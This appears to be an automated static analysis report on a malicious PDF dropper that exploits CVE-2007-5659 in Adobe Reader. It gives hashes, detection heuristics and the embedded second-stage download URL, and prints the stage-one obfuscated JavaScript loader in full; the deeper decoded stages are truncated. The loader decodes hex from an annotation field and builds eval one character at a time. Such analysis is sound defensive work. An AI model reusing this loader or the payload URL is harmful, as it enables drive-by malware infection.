Malicious PDF — malware analysis report

Static analysis result for SHA-256 142ecbcb50452733…

MALICIOUS

PDF

17.5 KB
MD5: 7fa82a9ad67567c3d81ed81b2073bf38
SHA-1: 6a6c9f6c858baf5a9d6905b074eefa7055cbb275
SHA-256: 142ecbcb504527334f0d93b27269532ec2241d01d6c7aee67c934a43baaa2700
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. This script is designed to download a second-stage payload from the embedded URL 'http://begemotina.info/page/gold.php/n00a102801r0007J11000601R43329fdcXdfcb93e7Y597a73f3Z03006f36'. The presence of multiple JavaScript exploit-related heuristics and the embedded URL strongly indicate a malicious dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [critical] [CVE exact] CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action [low] [5 related findings] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high] [CVE likely] PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [high] PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL [high] PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://begemotina.info/page/gold.php/n00a102801r0007J11000601R43329fdcXdfcb93e7Y597a73f3Z03006f36 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0009_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 9 at offset 0x4364
Size: 469 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: 07c5bba628a1d5c036f4790ca8b02b70b480a90e6be90891e65bb509b88f026b
Kind: deobfuscated-js
Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AC4
Size: 5284 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
... (truncated)
Filename: deobfuscated.js
SHA-256: 6e7180ee4c6c5dd6eefefd454f4f3bd00991bbf0c54e88e8d89b215d966e51e7
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 118707 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s) and 2 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
... (truncated)